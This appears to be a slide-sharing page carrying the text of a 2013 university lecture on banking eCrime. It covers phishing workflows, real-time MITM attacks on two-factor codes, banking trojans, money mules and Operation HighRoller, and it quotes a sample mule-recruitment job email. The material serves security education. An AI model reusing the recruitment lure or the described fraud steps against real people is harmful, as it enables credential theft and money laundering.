280 likes | 422 Views
The evolution of eCrime and the remote banking channels. Presentation to the RHUL MSc Information Security Summer School 9 September 2013 Dom Lucas. Overview. Setting the Scene Attacks & Exploits Monetising the attack The bigger picture. Setting the Scene. What is eCrime?.
E N D
The evolution of eCrime and the remote banking channels Presentation to the RHUL MSc Information Security Summer School 9 September 2013 Dom Lucas
Overview • Setting the Scene • Attacks & Exploits • Monetising the attack • The bigger picture
Why? In economic terms In criminal terms Wider Market Base. Greater ROI. Cost/Benefit Model. I rob banks ‘cos that’s where the money is Willie Sutton c1930
Phishing Explained 4. Phished Credentials forwarded to Drop server 6. Creds traded on online forums 5. Creds forwarded to phisher 1. Attacker creates / hijacks website 2. Phishing email sent 3. Victim directed to phishing site 7. Phishers use credentials to access genuine accounts
Phishing evolved MITM/Real-time Phishing Capture & use victim 2-FA pass code in real time thus defeating multi factor authentication. HTML form attachment Doesn't require a phishing a site and so evades traditional phishing takedown. Vhishing & Smishing Use of traditional social engineering techniques to gather credentials Use of VOIP technology to spoof & evade detection
Malware Carberp ICE IX ZEUS Spyeye Citadel Shylock
Attack vectors www.XXX.com
Beneficiaries/Money Mules Job offer We have found your resume at Monster.com and would like to suggest you a "Transfer manager" vacancy. We have thoroughly studied your resume and are happy to inform you that your skills completely meet our requirements for this position. Our company buy, sell, and exchange digital currencies, like E-gold and E-bullion. • Continues to be the Bottleneck • lots of credentials not enough mule accounts • Money Mule categories • The professionals • The unsuspecting/duped • Developments • Pre-Paid card accounts- lack of KYC • Fake online businesses • International Payments (SEPA) • International fraud payments to mule accounts across the EU.
Op HighRoller • Customised Zeus / Spyeye variant. • Automated. • Checked balance. • High net-worth accounts >e200,000. • Targeted over 60 institutions • Global network of mules.